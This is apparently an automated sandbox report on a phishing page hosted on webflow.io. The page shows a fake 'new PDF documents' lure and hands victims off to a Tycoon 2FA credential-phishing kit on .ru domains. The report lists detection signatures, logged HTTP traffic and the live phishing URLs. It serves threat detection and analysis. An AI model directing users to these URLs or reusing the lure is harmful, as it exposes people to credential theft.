Edit tour

Windows Analysis Report
https://littlestownseniorhighschool.webflow.io/

Overview

General Information

Sample URL:https://littlestownseniorhighschool.webflow.io/
Analysis ID:1651126
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2372 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4940 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_106JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.4.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      1.5.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        1.5.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          1.6.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            1.4.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://fgof.koxicarev.ru/favicon.icoAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_106, type: DROPPED
              Source: Yara matchFile source: 1.4.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.6.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.d.script.csv, type: HTML
              Source: https://littlestownseniorhighschool.webflow.io/Joe Sandbox AI: Page contains button: 'VIEW SECURE DOCUMENT' Source: '0.0.pages.csv'
              Source: 1.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://fgof.koxicarev.ru/zXMKsj/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `eval` to execute remote or dynamically generated code is a major red flag, and the script appears to be attempting to send user data to an untrusted domain. Overall, this script exhibits a high level of malicious intent and should be treated as a significant security risk.
              Source: Chrome DOM: 0.0OCR Text: New Document Received You'Ve received (2) new PDF Documents for your review Please sign & return VIEW SECURE DOCUMENT Made in Webflow
              Source: https://fgof.koxicarev.ru/zXMKsj/HTTP Parser: No favicon
              Source: https://fgof.koxicarev.ru/zXMKsj/HTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.5:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.140:443 -> 192.168.2.5:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.140:443 -> 192.168.2.5:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.120:443 -> 192.168.2.5:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.120:443 -> 192.168.2.5:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49757 version: TLS 1.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
              Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
              Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
              Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
              Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
              Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
              Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
              Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.137
              Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: littlestownseniorhighschool.webflow.ioConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveOrigin: https://littlestownseniorhighschool.webflow.iosec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/favicon.ico HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/favicon.ico HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiJo8sBCIWgzQEI9s/OAQiB1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /zXMKsj/ HTTP/1.1Host: fgof.koxicarev.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fgof.koxicarev.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fgof.koxicarev.ru/zXMKsj/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InRYVkFRN3NVU1VDQ3kzcmYwYVhjcUE9PSIsInZhbHVlIjoiOHB2QVdzZ2NDMVZOZ1NLTTlpUWNFcVlLVXE4dDJjWS8xQ0V1R29SYVFmNjNUK0YremFLRG1RNUZqT2ZqWTlORFBPcXFtYUh5TFN6L1VqQXcwaDNNUTBqWnJuaFlHRThaUFNuU1VxaHpvUWZnR2NWa2hkWGxFQnlDdGFGM0tzVnQiLCJtYWMiOiI5Yjc1ZjM5MThiNzczYTUwMzMxZjdhMzcyYTBmYWYyNGI2Nzc1ZWU3NmU2ZTU5N2IwZDliYWI4NTY4NTI5NmZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlNrSkhYU0dVTGhxNU55bWpjL0wySUE9PSIsInZhbHVlIjoiR1VvSityR0Z3T1NXazE5TUkzY0dUVTc3UklPQkFmd2piTmJoeWpXNHJVMEdSVHlRUldwOGZ5RU5tLzB2R1NZL2Fzd1F1NnFpdFViQnZXTmp2UG1nNHE2WXVJYkJRUEI0b0hzTEhYY1JVai9ySXZXdkQ0ZlNQL0hsNytuQkJYMzciLCJtYWMiOiIyYWE5YzIxMmEyMGExMmE0OGMwNTFkYjMxY2RhYmYxYzYzOTRhNjgzOTgyOWE5NzM3NmY3ZDU5MTU4MzU2NzIxIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kabutar@sp5p7o HTTP/1.1Host: zh1od.idmquc.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://fgof.koxicarev.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fgof.koxicarev.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /kabutar@sp5p7o HTTP/1.1Host: zh1od.idmquc.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /kabutar@sp5p7o HTTP/1.1Host: zh1od.idmquc.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://fgof.koxicarev.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fgof.koxicarev.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /kabutar@sp5p7o HTTP/1.1Host: zh1od.idmquc.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: littlestownseniorhighschool.webflow.io
              Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
              Source: global trafficDNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
              Source: global trafficDNS traffic detected: DNS query: fgof.koxicarev.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: zh1od.idmquc.ru
              Source: unknownHTTP traffic detected: POST /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 432Content-Type: application/reports+jsonOrigin: https://fgof.koxicarev.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 12:42:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=24410&min_rtt=10068&rtt_var=17927&sent=107&recv=49&lost=0&retrans=1&sent_bytes=113511&recv_bytes=6638&delivery_rate=1882865&cwnd=111&unsent_bytes=0&cid=7c5043c8bef34e9a&ts=458424&x=0"Age: 8628Server: cloudflareCF-RAY: 927735d3fb894386-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=90033&min_rtt=89796&rtt_var=19300&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1899&delivery_rate=33764&cwnd=252&unsent_bytes=0&cid=957119c2b1bbfb90&ts=1040&x=0"
              Source: chromecache_100.6.drString found in binary or memory: https://FgoF.koxicarev.ru/zXMKsj/
              Source: chromecache_100.6.drString found in binary or memory: https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.
              Source: chromecache_100.6.drString found in binary or memory: https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js
              Source: chromecache_100.6.drString found in binary or memory: https://cdn.prod.website-files.com/img/favicon.ico
              Source: chromecache_100.6.drString found in binary or memory: https://cdn.prod.website-files.com/img/webclip.png
              Source: chromecache_100.6.drString found in binary or memory: https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e59
              Source: chromecache_100.6.drString found in binary or memory: https://webflow.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.5:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49736 version: TLS 1.2
